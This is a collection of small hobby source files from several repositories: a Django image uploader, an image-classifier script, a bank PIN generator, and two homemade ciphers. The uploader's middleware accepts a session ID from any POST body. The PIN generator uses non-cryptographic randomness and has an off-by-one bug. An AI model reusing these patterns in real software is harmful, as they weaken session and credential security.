"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 102, "num_lines": 13, "path": "/imahe/middleware.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 22, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf import settings\n\nclass UploadifyMiddleware(object):\n \n def process_request(self, request):\n if request.method == 'POST' and request.POST.has_key(settings.SESSION_COOKIE_NAME):\n request.COOKIES[settings.SESSION_COOKIE_NAME] = request.POST[settings.SESSION_COOKIE_NAME]" }, { "alpha_fraction": 0.6243902444839478, "alphanum_fraction": 0.6487804651260376, "avg_line_length": 13.714285850524902, "blob_id": "12cb482ba27cd1771e04bdb913ba046d937ca1ae", "content_id": "e22b50686a08304b1b941ff462d918c7126c9573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 32, "num_lines": 14, "path": "/post/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 3, 2012\n\n@author: pvergil\n'''\n\nfrom django import forms\n\nfrom post.models import Post\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n fields = ('content',)" }, { "alpha_fraction": 0.689061164855957, "alphanum_fraction": 0.6916451454162598, "avg_line_length": 30.405405044555664, "blob_id": "0408413fdce5950fb7119370feb80249ef50a57e", "content_id": "cf7419446f95243bfd09c19749d5b9fa08584033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", "max_line_length": 98, "num_lines": 37, "path": "/post/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import os\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nimport utils\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/images/%d/%d/%d/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumbs/%d/%d/%d/%s%s')\n\ndef _upload(instance, filename, path):\n today = datetime.datetime.now()\n randname = utils.get_random_string()\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.post.author.id, today.year, today.month, today.day, randname, file_ex)\n\nclass Post(models.Model):\n author = models.ForeignKey(User)\n content = models.CharField(max_length=255)\n postdate = models.DateTimeField(auto_now_add=True)\n \n @models.permalink\n def get_absolute_url(self):\n return ('post_view', (self.id,))\n \nclass PostImage(models.Model):\n post = models.ForeignKey(Post, related_name='postimages')\n \n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n \n def get_absolute_url(self):\n return ('post_image', (self.id,))" }, { "alpha_fraction": 0.561613142490387, "alphanum_fraction": 0.5623599886894226, "avg_line_length": 31.682926177978516, "blob_id": "1a5e653bf6cfbb08da93ab52b26d408f9ed53bea", "content_id": "26f0b0d080843c5a1244137583057af86973bda2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1339, "license_type": "no_license", "max_line_length": 71, "num_lines": 41, "path": "/accounts/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView\n\nfrom accounts.forms import RegistrationForm\n\nclass AccountRegister(TemplateView):\n template_name = 'accounts/register.html'\n \n def get_context_data(self, **kwargs):\n form = RegistrationForm()\n return {\n 'form': form\n }\n \n def post(self, request, *args, **kwargs):\n form = RegistrationForm(request.POST)\n \n if form.is_valid():\n fname = form.cleaned_data.get('fname')\n lname = form.cleaned_data.get('lname')\n usrnm = form.cleaned_data.get('usrnm')\n email = form.cleaned_data.get('email')\n passw = form.cleaned_data.get('pass1')\n \n user = User.objects.create_user(usrnm, email, passw)\n user.first_name = fname\n user.last_name = lname\n \n user.save()\n \n messages.info(request,\n '''Your new account has been created.\n You may now login using your username and password.''')\n \n return redirect('account_login')\n else:\n return self.render_to_response({\n 'form': form\n })" }, { "alpha_fraction": 0.7250000238418579, "alphanum_fraction": 0.75, "avg_line_length": 13.357142448425293, "blob_id": "18af9d3601e1d9004ee5194434b9c4e292475466", "content_id": "a2405ccc0e206227dec139ccff2cdf3b43600dcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 38, "num_lines": 14, "path": "/imahe/admin.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 2, 2012\n\n@author: pvergil\n'''\n\nfrom django.contrib import admin\n\nfrom imahe.models import Photo\n\nclass PhotoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Photo, PhotoAdmin)" }, { "alpha_fraction": 0.6262458562850952, "alphanum_fraction": 0.6362126469612122, "avg_line_length": 30.736841201782227, "blob_id": "207346fdf7817c15c4424a68fa0f77515a5b3eaa", "content_id": "1ff18cd498a25dee0f9ff27f643756a0194c91ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 121, "num_lines": 19, "path": "/imahe/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 11, 2012\n\n@author: pvergil\n'''\n\nfrom django import forms\n\nfrom imahe.models import Photo\n\nclass PhotoEditorForm(forms.ModelForm):\n title = forms.CharField(label='Title', widget=forms.TextInput(attrs={'placeholder': 'Photo title'}),\n error_messages={'required': 'Please enter a title for this photo.'})\n description = forms.CharField(label='Description', widget=forms.Textarea(attrs={'placeholder': 'Photo Description'}),\n required=False)\n \n class Meta:\n model = Photo\n fields = ('title', 'description',)" } ]
26
b0bbyj0nes/mech_part_recon
https://github.com/b0bbyj0nes/mech_part_recon
833bb4036f4324e3dfdbf9beaa3101a896a1d359
857d8e275627e0a917313f093f51bc5b5c800be9
98897dd750067c02399a09d0c065f9c2b107509b
refs/heads/main
2023-06-06T13:33:45.104366
2021-06-30T07:52:22
2021-06-30T07:52:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5474234223365784, "alphanum_fraction": 0.5631067752838135, "avg_line_length": 27.18947410583496, "blob_id": "861bded4d02bbace182e680f925213e0bbf6229b", "content_id": "8882b966250c874d9a680528fec5ac8575a9442f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2678, "license_type": "no_license", "max_line_length": 70, "num_lines": 95, "path": "/main.py", "repo_name": "b0bbyj0nes/mech_part_recon", "src_encoding": "UTF-8", "text": "#import os\n#import cv2\n#import numpy as np\n#from helpers import load_labels\n#def main() -> ():\n# labels_dir: str = os.path.abspath(\"./labels.json\")\n# labels = load_labels(labels_dir)\n\n# dat_dir: str = os.path.abspath(\"./dat/blnw-images-224\")\n# categories: list = os.listdir(dat_dir)\n# img_array = []\n# labels_array = []\n# img_array_file = os.path.abspath(\"./imgs.npy\")\n# img_labels_file = os.path.abspath(\"./labels.npy\")\n# for cat in categories:\n# imgs_list = os.listdir(f\"{dat_dir}/{cat}\")\n# for img in imgs_list:\n# img_path = os.path.join(dat_dir, cat, img)\n# print(f'loading {img_path}')\n# img_to_dat = cv2.imread(img_path, 0)/255.0\n# img_array.append(img_to_dat)\n# labels_array.append(labels[cat])\n# \n# img_array = np.array(img_array)\n# labels_array = np.array(labels_array)\n\n\n\n#if __name__ == \"__main__\":\n# main()\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # To avoid tensorflow warning\nfrom tensorflow.keras.utils import to_categorical\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\nfrom helpers import *\nfrom this_model import *\n\ndef main() -> ():\n labels_dir: str = os.path.abspath(\"./labels.json\")\n labels = load_labels(labels_dir)\n\n dat_dir: str = os.path.abspath(\"./dat/resized_data\")\n categories: list = os.listdir(dat_dir)\n\n _train: float = 0.75\n\n ## model parameters\n in_shape: tuple = (64, 64, 1)\n num_of_filters: int = 64\n kernel_size: tuple = (3, 3)\n\n #training hyper parameters\n epoch: int = 15\n batch_size: int = 64\n\n model = make_model(in_shape, kernel_size, num_of_filters)\n\n imgs: Imgs = Imgs()\n type(imgs)\n for cat in categories:\n imgs_list = os.listdir(f\"{dat_dir}/{cat}\")\n for img in imgs_list:\n img_path = os.path.join(dat_dir, cat, img)\n print(f'{len(imgs)} - loading {img_path}')\n img_to_dat = cv2.imread(img_path, 0)/255.0\n img_obj = Img(img_path, labels[cat], img_to_dat)\n imgs + img_obj\n print(imgs)\n breakpoint()\n\n data, labels = imgs.to_array()\n X_train, X_test, Y_train, Y_test = train_test_split(\n data, \n labels, \n train_size = 0.75, \n test_size = 0.25, \n random_state = 42\n )\n\n\n Y_train = to_categorical(Y_train)\n Y_test = to_categorical(Y_test)\n history = fit_model(X_train, Y_train,\n X_test, Y_test,\n epoch, batch_size,\n model\n )\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
rhobro/qb-pin-gen
https://github.com/rhobro/qb-pin-gen
23bf1c4daf304ce37d9553f2a86523dbbdb87d9d
745ab5d784fa813b2d379a979eaa0a65317ea221
001e7c25547e6ae126a549bf834efd48b1289a1f
refs/heads/master
2023-02-22T20:49:15.851479
2021-01-21T09:58:05
2021-01-21T09:58:05
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5796178579330444, "alphanum_fraction": 0.5796178579330444, "avg_line_length": 30.399999618530273, "blob_id": "fcd1832aedaf3e973d8d81f4480c268c18e2bf89", "content_id": "546686b66ad8dd596572d7e30362b849d82458ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 51, "num_lines": 5, "path": "/customer.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "class Customer:\n def __init__(self, account_n, sort, past_pins):\n self.acc = account_n\n self.sort = sort\n self.past_pins = past_pins\n" }, { "alpha_fraction": 0.5395962595939636, "alphanum_fraction": 0.6746894121170044, "avg_line_length": 41.93333435058594, "blob_id": "1a06c61b57bf7336d332f3ea7b5c7dc61ef128f3", "content_id": "cd25d2353bba5b35a098804585062712b7a8cbb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1288, "license_type": "no_license", "max_line_length": 98, "num_lines": 30, "path": "/test.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "from condition import *\nfrom customer import Customer\n\n# Inputs - change as necessary\nCUSTOMER_BANK_ACCOUNT_NUMBER = \"13659275\"\nCUSTOMER_BANK_SORT_CODE = \"23-05-33\"\nCUSTOMER_PREVIOUS_PINS = [\"1948\", \"4729\", \"6758\", \"3648\"]\n\n# customer and generator construction\nc = Customer(CUSTOMER_BANK_ACCOUNT_NUMBER, CUSTOMER_BANK_SORT_CODE, CUSTOMER_PREVIOUS_PINS)\n\nseq = MoreThan2Consec().filter([\"1133\", \"2226\", \"6227\", \"4888\", \"9879\"])\nif \"2226\" in seq or \"4888\" in seq:\n print(f\"MoreThan2Consec().filter() missed consecutive sequence of 2 numbers, producing {seq}\")\n\nseq = ConsecSeq().filter([\"1388\", \"2434\", \"2345\", \"1123\", \"6789\"])\nif \"2345\" in seq or \"6789\" in seq:\n print(f\"ConsecSeq().filter() missed consecutive sequence, producing {seq}\")\n\nseq = PrevPins(3).filter([\"1133\", \"2226\", \"4729\", \"4888\", \"6758\"], c)\nif \"4729\" in seq or \"6758\" in seq:\n print(f\"PrevPins().filter() missed previous pins, producing {seq}\")\n\nseq = InAccNum().filter([\"6592\", \"2226\", \"6227\", \"9275\", \"9879\"])\nif \"6592\" in seq or \"9275\" in seq:\n print(f\"InAccNum().filter() missed pins in account number, producing {seq}\")\n\nseq = InSortCode().filter([\"1133\", \"2226\", \"0533\", \"4888\", \"3053\"])\nif \"0533\" in seq or \"3053\" in seq:\n print(f\"InSortCode().filter() missed pins in sort code, producing {seq}\")\n" }, { "alpha_fraction": 0.7043618559837341, "alphanum_fraction": 0.7560581564903259, "avg_line_length": 27.136363983154297, "blob_id": "b1a58a48733cb1423f64e28d27d21d5f51f1d322", "content_id": "16d3ff96e500026cf7bb35007d39f7a0704bf35f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "no_license", "max_line_length": 91, "num_lines": 22, "path": "/main.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "from condition import *\nfrom customer import Customer\nfrom gen import Generator\n\n# Inputs - change as necessary\nCUSTOMER_BANK_ACCOUNT_NUMBER = \"13659275\"\nCUSTOMER_BANK_SORT_CODE = \"23-05-33\"\nCUSTOMER_PREVIOUS_PINS = [\"1948\", \"4729\", \"6758\", \"3648\"]\n\n# customer and generator construction\nc = Customer(CUSTOMER_BANK_ACCOUNT_NUMBER, CUSTOMER_BANK_SORT_CODE, CUSTOMER_PREVIOUS_PINS)\ngen = Generator()\n\n# Add more conditions as necessary\ngen.add_cond(MoreThan2Consec())\ngen.add_cond(ConsecSeq())\ngen.add_cond(PrevPins(depth=3))\ngen.add_cond(InAccNum())\ngen.add_cond(InSortCode())\n\n# running the generator\nprint(gen.gen(c))\n" }, { "alpha_fraction": 0.7403903007507324, "alphanum_fraction": 0.7569485306739807, "avg_line_length": 45.97222137451172, "blob_id": "cefd25843e0e4eb3d25a80f5ffb785d0382047b2", "content_id": "64c9b71e073a819adf320eac3ce83ea91008eac9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3382, "license_type": "no_license", "max_line_length": 120, "num_lines": 72, "path": "/README.md", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "# QuantBet \"QuantBank\" Challenge\n\n### Challenge Description\n\nQuantBet is opening a new bank called QuantBank and require you to write a piece of software to generate new PINs for\ncustomer cards. When generating a PIN, you will be provided with the customer's personal details (eg name, date of\nbirth), and the details of the bank account (eg sort code, account number). The generated PIN must satisfy the following\nrules:\n\n- It should be 4 digits long\n- It must not contain more than two consecutive numbers (eg 1112, 1111 are not allowed; 1211 is allowed)\n- It must not contain a complete consecutive number sequence (eg 1234, 3456 are not allowed)\n- It is distinct from the user's past three PINs (you may assume that a sufficient history is provided alongside the\n bank account details)\n- It cannot be contained in the user's bank account number or sort code (eg for an account with sort code 71-13-13 and\n account number 13561342, the PINs 1356, 1342 and 7113 are all not allowed)\n\n### Installation\n\n- This solution has been developed and tested on `Python 3.8.5`. However, it should be compatible with all Python 3\n installations\n- To run the main script, use `python main.py` after altering the parameters in the file to suit your needs.\n- To run tests on the code, use `python test.py`.\n\n### Design\n\n- `main.py` - contains the runnable script\n- `test.py` - contains the tests that can be performed to check for bugs\n- `gen.py` - contains the configuration for the `Generator` class\n- `condition.py` - contains the definition of `Condition` interface as well as classes which satisfy it. More\n definitions for custom conditions can be added to this file.\n- `customer.py` - defines the basic `Customer` construct which contains information which may be used in conditions.\n\nThis project has been designed with modularity and usability in mind in order to simplify the addition of new\n`Condition` classes.\n\nThe generator has been designed so that valid lists of pins \"cascade\" through the layers of conditions. It is the\nblueprint by which any numbers of conditions can be used since all conditions must satisfy the\n`Condition` interface - thus ensuring they have the correct methods.\n\nThis ensures that there is sufficient modularity that different conditions can be used at different times, without\naffecting the rest of the code. This means that any security auditing only has to be done on the added code of the\ncondition rather than checking the whole application. After a condition has been designed and implemented, one\nonly has to add it to the generator using the `add_cond()` method, and the run code for the generator can remain\nunchanged.\n\nFor example, if I wanted to add a condition which ensures that the pin cannot start with a \"0\", all I would have to do\nis define the code for the condition as a class which implements the `Condition` interface and add it to\n`condition.py`, like this:\n\n```python\n# condition.py\n\nclass First0Digit(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n\n for p in pins:\n if p[0] != \"0\":\n satisfied.append(p)\n return satisfied\n```\n\nThen I would go to `main.py` and add a constructed condition to the generator with\n```python\n# main.py\n\ngen.add_cond(First0Digit())\n```\nin the section which is clearly labeled as the place to add this code.\n\nThere! That was easy!\n" }, { "alpha_fraction": 0.5611038208007812, "alphanum_fraction": 0.5755584836006165, "avg_line_length": 25.241378784179688, "blob_id": "a0a0d040b84c0aa4815509dcd3a3fbb82f97e0c2", "content_id": "1feec8670b69aa1ed5c30db87e18b99d8977c11a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 70, "num_lines": 29, "path": "/gen.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "import random as rd\n\nfrom condition import Condition\nfrom customer import Customer\n\ndigits = [str(n) for n in range(10)]\n\n\nclass Generator:\n def __init__(self):\n self.conditions = []\n\n def add_cond(self, cond: Condition):\n self.conditions.append(cond)\n\n def gen(self, customer: Customer) -> str:\n # generate all combos\n combos = []\n for dig0 in digits:\n for dig1 in digits:\n for dig2 in digits:\n for dig3 in digits:\n combos.append(dig0 + dig1 + dig2 + dig3)\n\n # filter for each condition\n for c in self.conditions:\n combos = c.filter(combos, customer)\n\n return combos[rd.randint(0, len(combos))] # return random pin\n" }, { "alpha_fraction": 0.558486819267273, "alphanum_fraction": 0.5848680734634399, "avg_line_length": 23.80246925354004, "blob_id": "8289f495493115a2bdf4a5215bc439ac0e86adf6", "content_id": "f1f9a06ab04115517e85140eda717cc9095f1bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "no_license", "max_line_length": 84, "num_lines": 81, "path": "/condition.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "# Copyright © 2021 NeuroByte Tech. All rights reserved.\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 22:00\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 21:54\n#\n# NeuroByte Tech is the Developer Company of Rohan Mathew.\n#\n# Project: qbPinGenerator\n# File Name: condition.py\n# Last Modified: 20/01/2021, 21:18\n\n\nclass Condition:\n \"\"\"interface for conditions\"\"\"\n\n def filter(self, pins, *args) -> list:\n \"\"\"\n :param pins is a list of 4-digit strings of pins\n :return list of pins from the parameters which satisfy the defined condition\n \"\"\"\n return pins\n\n\nclass MoreThan2Consec(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n\n for p in pins:\n valid = True\n\n for j, c in enumerate(p[:-2]):\n if c == p[j + 1] == p[j + 2]:\n valid = False\n break\n\n if valid:\n satisfied.append(p)\n\n return satisfied\n\n\ndigits = [str(n) for n in range(10)]\nconsec_seqs = []\nfor i in range(len(digits) - 3):\n consec_seqs.append(\"\".join(digits[i: i + 4]))\n\n\nclass ConsecSeq(Condition):\n def filter(self, pins, *args) -> list:\n satisfied = []\n for p in pins:\n if p not in consec_seqs:\n satisfied.append(p)\n return satisfied\n\n\nclass PrevPins(Condition):\n def __init__(self, depth):\n self.d = depth\n\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].past_pins[-1 * self.d:]]\n\n\nclass InAccNum(Condition):\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].acc]\n\n\nclass InSortCode(Condition):\n def filter(self, pins, *args) -> list:\n return [p for p in pins if p not in args[0].sort.replace(\"-\", \"\")]\n" } ]
6
YaF3li/ciphers
https://github.com/YaF3li/ciphers
b03b9cdeefc315140d9b4a50923b13efa3b3f809
b3940b6b5d1b01cce2937f6033120daffd54bddd
c1c1ffe46a523adf0482cb9495f53dd8668a4461
refs/heads/master
2021-07-17T08:55:43.921433
2020-09-04T19:15:45
2020-09-04T19:15:45
206,738,805
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6247464418411255, "alphanum_fraction": 0.6369168162345886, "avg_line_length": 19.58333396911621, "blob_id": "81036a979bbc7f083599aab30c71684951e3e40e", "content_id": "6f1f876b5b5442736f0cd3eeba1b6b7333bc3e6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 493, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/TripleShuffle/run.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "import sys\nfrom TripleShuffle import Cipher\n\nif len(sys.argv) < 5:\n print(\"Arguments: <enc|dec> <indexA> <indexB> <text>\")\n sys.exit(1)\n\nmode = sys.argv[1]\nindexA = sys.argv[2]\nindexB = sys.argv[3]\ntext = sys.argv[4]\n\noutput = \"-\"\ntry:\n cipher = Cipher(indexA, indexB)\n if mode == \"enc\":\n output = cipher.encipher(text)\n elif mode == \"dec\":\n output = cipher.decipher(text)\nexcept:\n print(\"Sorry, error occured. Check your arguments.\")\n\nprint(text)\nprint(output)" }, { "alpha_fraction": 0.747863233089447, "alphanum_fraction": 0.7606837749481201, "avg_line_length": 28.25, "blob_id": "b54f1d35fad8f47c48d043abdadb3f31d324e79e", "content_id": "e35866dd51fcbe7dbd9493f96748ae820177fb33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 95, "num_lines": 8, "path": "/Kotzelfoa/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Kotzelfoa speakable code language\nCreated by Garrett Warren\n\nSee https://www.reddit.com/r/codes/comments/i4lv1j/a_speakable_and_writable_code_i_made_called/\n\nPython 3 implementation by me\n\nCall: python Kotzelfoa/run.py \\<enc|dec> \"\\<text>\"\n" }, { "alpha_fraction": 0.4801619350910187, "alphanum_fraction": 0.4955465495586395, "avg_line_length": 26.455554962158203, "blob_id": "dff773c6544d1075d767a9ceddf049e2c242b197", "content_id": "28c760896e3578ed31d87fd820b0d20dd8c6e4a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2470, "license_type": "no_license", "max_line_length": 66, "num_lines": 90, "path": "/TripleShuffle/__init__.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# \"Triple Shuffle Cipher\"\n# Developed by YaF3li\n\nclass Cipher:\n def __init__(self, indexA, indexB):\n self.alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n if self.check_index(indexA) != 1:\n raise Exception()\n if self.check_index(indexB) != 1:\n raise Exception()\n \n self.initialA = indexA\n self.initialB = indexB\n self.reset()\n\n def check_index(self, index):\n if len(index) != len(self.alphabet):\n return 0\n for c in index:\n if self.alphabet.find(c) < 0:\n return 0\n return 1\n\n def encipher(self, input):\n self.reset()\n \n output = []\n lastIndex = 0\n for c in input:\n index = ord(c) - 65\n if index >= 0 and index <= 25:\n self.shuffle(lastIndex)\n c = self.alphabet[self.get_wiring(index)]\n output.append(c)\n lastIndex = index\n return \"\".join(output)\n \n def decipher(self, input):\n self.reset()\n \n output = []\n lastIndex = 0\n for c in input:\n index = ord(c) - 65\n if index >= 0 and index <= 25:\n self.shuffle(lastIndex)\n index = self.get_wiring_reverse(index)\n output.append(self.alphabet[index])\n lastIndex = index\n return \"\".join(output)\n\n def get_wiring(self, index):\n c = self.indexA[index]\n return self.indexB.find(c)\n\n def get_wiring_reverse(self, index):\n c = self.indexB[index]\n return self.indexA.find(c)\n\n def shuffle(self, additive):\n if self.swapShuffle != 0:\n splice = self.indexB\n move = self.indexA\n else:\n splice = self.indexA\n move = self.indexB\n \n # Splice 1\n splice = splice[13:] + splice[:13]\n \n # Splice 2\n index = (7 + additive) % 26\n splice = splice[index] + splice[:index] + splice[index+1:]\n \n # Move\n move = move[18:] + move[:18]\n \n if self.swapShuffle != 0:\n self.indexB = splice\n self.indexA = move\n else:\n self.indexA = splice\n self.indexB = move\n \n self.swapShuffle = (self.swapShuffle + 1) % 2\n\n def reset(self):\n self.indexA = self.initialA\n self.indexB = self.initialB\n self.swapShuffle = 0" }, { "alpha_fraction": 0.7235772609710693, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 40, "blob_id": "aca540fe6f857a2c15620c953eaed84ef1fccdb7", "content_id": "5effd46f1f495d3e79c538474265759c78978ee1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 123, "license_type": "no_license", "max_line_length": 72, "num_lines": 3, "path": "/TripleShuffle/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Triple Shuffle cipher\nPython 3 implementation \nCall: python TripleShuffle/run.py \\<enc|dec> \\<indexA> \\<indexB> \\<text>\n" }, { "alpha_fraction": 0.7538461685180664, "alphanum_fraction": 0.7538461685180664, "avg_line_length": 31.5, "blob_id": "9ef7c7254b04deb6f1ef2abac4a8affaf6436720", "content_id": "f16fd7c0ef8181773633ba71a2de1a639f9a9321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 65, "license_type": "no_license", "max_line_length": 54, "num_lines": 2, "path": "/README.md", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# Ciphers\nDo not use for actual crypto, this is a hobby project!\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.6354166865348816, "avg_line_length": 16.5, "blob_id": "7140798cbc72bc1f5070227f30fb84aa7f78c479", "content_id": "85b465ff862dce75197f2123b8b553c2692777ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 57, "num_lines": 22, "path": "/Kotzelfoa/run.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "import sys\nfrom Kotzelfoa import Code\n\nif len(sys.argv) < 2:\n print(\"Arguments: <enc|dec> <text>\")\n sys.exit(1)\n\nmode = sys.argv[1]\ntext = sys.argv[2]\n\noutput = \"-\"\n#try:\ncode = Code()\nif mode == \"enc\":\n output = code.encode(text)\nelif mode == \"dec\":\n output = code.decode(text)\n#except:\n# print(\"Sorry, error occured. Check your arguments.\")\n\nprint(text)\nprint(output)" }, { "alpha_fraction": 0.42136043310165405, "alphanum_fraction": 0.43090182542800903, "avg_line_length": 37.69047546386719, "blob_id": "d5d0deafa2c7c67c58d7c27b4f11abf03fa79d33", "content_id": "a89bbaa2dec365332a4040940a2607378465b49e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3249, "license_type": "no_license", "max_line_length": 179, "num_lines": 84, "path": "/Kotzelfoa/__init__.py", "repo_name": "YaF3li/ciphers", "src_encoding": "UTF-8", "text": "# \"Kotzelfoa\"\n# by Garrett Warren\n# Program by YaF3li\n\nclass Code:\n def __init__(self):\n self.alphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n self.vowels = \"AEIOU\"\n self.vowel_separator = 't'\n self.single_letter_indicator = 'p'\n self.codeA = [\"z\", \"sm\", \"sp\", \"g\", \"f\", \"v\", \"sh\", \"l\", \"sk\", \"b\", \"ch\", \"shk\", \"d\", \"jh\", \"j\", \"s\", \"sf\", \"tz\", \"st\", \"r\", \"h\", \"shl\", \"k\", \"th\", \"fl\", \"shp\"]\n self.codeB = [\"o\", \"ain\", \"oi\", \"an\", \"i\", \"ai\", \"am\", \"ia\", \"u\", \"om\", \"oin\", \"on\", \"oe\", \"oa\", \"a\", \"em\", \"oan\", \"en\", \"in\", \"im\", \"e\", \"ian\", \"oam\", \"oen\", \"iam\", \"un\"]\n self.codes = [self.codeA, self.codeB]\n\n def next_token(self, input, position, code):\n token = input[position : position + 3]\n while not (token in code):\n token = token[0 : len(token) - 1]\n if len(token) <= 0:\n return \"\", position + 1\n return token, position + len(token)\n \n def encode(self, input):\n input = input.upper()\n \n output = \"\"\n for word in input.split():\n if len(word) <= 0:\n continue\n if len(word) <= 1:\n charIdx = self.alphabet.find(word[0])\n if charIdx >= 0:\n output += self.single_letter_indicator + self.codeB[charIdx] + \" \"\n continue\n bigrams = [[]]\n for c in word:\n charIdx = self.alphabet.find(c)\n if charIdx >= 0:\n idx = len(bigrams) - 1\n if len(bigrams[idx]) >= 2:\n bigrams.append([])\n idx += 1\n bigrams[idx].append(charIdx)\n \n for bigram in bigrams:\n if len(bigram) < 2:\n lastChar = output[len(output) - 1].upper()\n if self.vowels.find(lastChar) >= 0:\n output += self.vowel_separator\n output += self.codeB[bigram[0]]\n else:\n output += self.codeA[bigram[0]]\n output += self.codeB[bigram[1]]\n output += \" \"\n return output\n \n def decode(self, input):\n input = input.lower()\n \n output = \"\"\n for word in input.split():\n if len(word) <= 0:\n continue\n if len(word) <= 2 and word[0] == self.single_letter_indicator:\n if word[1] in self.codeB:\n idx = self.codeB.index(word[1])\n output += self.alphabet[idx]\n output += \" \"\n continue\n \n position = 0\n code = 0\n while position < len(word):\n lastPosition = position\n token, position = self.next_token(word, position, self.codes[code])\n if position >= len(word):\n code = 1\n token, position = self.next_token(word, lastPosition, self.codes[code])\n if len(token) > 0:\n idx = self.codes[code].index(token)\n output += self.alphabet[idx]\n code = (code + 1) % 2\n output += \" \"\n return output" } ]
7
kuangrp/upload
https://github.com/kuangrp/upload
3fff7a04ce3ab337871ffcac49017c9a4799163b
371bdf366c58014e8ffa7bbec9a4024f13e21415
941b0533d0720370578c3e00ea75983abf8a5236
refs/heads/master
2020-04-02T23:02:23.873519
2018-11-26T10:42:52
2018-11-26T10:42:52
154,853,654
0
0
null
null
null
null
null
